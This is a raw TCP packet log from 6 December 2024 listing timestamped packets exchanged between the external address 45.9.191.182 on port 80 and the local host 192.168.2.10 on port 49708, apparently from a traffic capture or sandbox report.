Dec 6, 2024 11:05:32.635520935 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.636285067 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.636329889 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.636445045 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.637650967 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.637664080 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.637689114 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.638674021 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.638685942 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.638715982 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.639731884 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.639770031 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.639895916 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.640829086 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.640866041 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.640985966 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.641931057 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.641942978 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.641973972 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.642889023 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.642930984 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.643044949 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.644140959 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.644181013 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.644319057 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.645066023 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.645112991 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.645231962 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.646161079 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.646207094 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.646327019 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.647306919 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.647351980 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.647485018 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.648262978 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.648308039 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.648423910 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.649357080 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.649403095 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.649543047 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.650629044 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.650671959 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.651104927 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.651741982 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.651787043 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.651900053 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.652704954 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.652749062 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.652833939 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.653965950 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.654042959 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.654119968 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.654895067 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.654938936 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.655077934 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.655997992 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.656050920 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.656166077 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.657097101 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.657145977 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.657277107 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.658255100 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.658267975 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.658301115 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.659264088 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.659276962 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.659311056 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.660393000 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.660404921 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.660435915 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.661348104 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.661390066 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.661513090 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.662457943 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.662499905 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.662643909 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.663682938 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.663695097 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.663726091 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.664609909 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.664652109 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.664772034 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.665735960 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.665781021 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.665901899 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.668509960 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.668523073 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.668534040 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.668548107 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.668559074 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.668581963 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.668950081 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.669095993 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.669118881 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.669508934 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.669558048 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.669585943 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.672276020 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.672324896 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.672439098 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.673381090 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.673429012 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.673573971 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.673733950 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.673746109 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.673777103 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.674478054 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.674490929 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.674530983 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.675760031 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.675774097 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.675812960 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.677026987 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.677072048 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.677176952 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.723824024 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.812544107 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.812778950 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.812838078 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.813080072 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.813265085 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.813313007 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.814105034 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.814265013 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.814328909 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.815285921 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.815365076 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.815421104 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.816317081 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.816561937 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.816605091 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.817378998 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.817504883 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.817549944 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.818512917 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.818835020 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.818897963 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.819582939 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.819628954 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.819677114 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.820641994 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.820753098 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.820811033 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.821765900 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.821829081 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.821877956 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.822813988 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.822954893 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.823002100 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.823934078 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.824038029 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.824080944 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.824954987 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.825040102 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.825081110 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.826103926 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.826179981 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.826224089 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.827174902 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.827297926 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.827337027 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.828274965 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.828366041 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.828404903 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.829360962 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.829422951 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.829461098 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.830384970 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.830562115 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.830605984 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.831480026 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.831588984 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.831629038 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.832571983 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.832640886 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.832680941 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.833734989 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.834098101 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.834142923 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.834851027 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.834961891 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.835005045 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.835854053 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.835932970 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.835997105 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.836918116 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.837047100 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.837090015 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.838032007 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.838200092 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.838241100 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.839124918 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.839363098 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.839409113 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.840210915 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.840318918 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.840361118 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.841344118 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.841558933 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.841605902 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.842375994 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.842525005 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.842566967 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.843530893 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.843632936 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.843677998 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.844561100 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.844682932 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.844729900 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.845719099 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.845786095 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.845834017 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.846757889 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.846951008 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.846992970 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.847811937 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.847899914 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.847943068 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.848938942 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.848972082 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.849010944 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.849984884 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.850122929 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.850164890 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.851084948 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.851222038 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.851278067 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.852142096 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.852284908 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.852333069 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.853235006 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.853301048 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.853348970 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.854378939 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.854443073 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.854487896 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.855411053 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.855536938 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.855592966 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.856600046 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.856714010 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.856761932 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.857611895 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.857697010 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.857743025 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.858653069 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.858772039 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.858818054 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.859775066 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.859930038 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.859972954 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.860867023 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.861011028 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.861052036 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.861941099 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.862099886 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.862158060 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.862996101 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.863176107 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.863215923 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.864098072 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.864330053 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.864403963 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.865200996 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.865425110 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.865469933 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.866265059 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.866566896 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.866614103 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.867358923 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.867508888 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.867554903 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.868510008 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.868575096 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.868627071 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:32.869508028 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:32.911323071 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:33.004709959 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.004897118 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.004980087 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:33.005213976 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.005284071 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.005337000 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:33.006262064 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.006402969 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.006453037 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:33.007375956 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.007529974 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.007579088 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:33.008502007 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.008652925 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.008702993 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:33.009551048 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.009637117 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.009687901 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:33.010792971 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.010962963 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.011096954 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:33.011765957 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.011848927 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.011908054 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:33.012816906 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.012898922 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.012960911 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:33.013906956 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.013952017 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.014004946 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:33.015023947 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.015106916 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.015166998 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:33.016083956 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.016155005 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.016206980 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:33.017146111 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.017261982 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.017313004 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:33.018255949 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.018320084 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.018373013 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:33.019357920 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.019387960 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.019455910 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:33.020417929 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.020523071 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.020577908 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:33.021522999 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.021589994 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.021656990 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:33.022567034 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.022670984 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.022725105 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:33.023700953 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.023850918 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.023912907 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:33.024771929 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.024800062 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.024867058 CET	49708	80	192.168.2.10	45.9.191.182
Dec 6, 2024 11:05:33.025836945 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.025989056 CET	80	49708	45.9.191.182	192.168.2.10
Dec 6, 2024 11:05:33.026046991 CET	49708	80	192.168.2.10	45.9.191.182
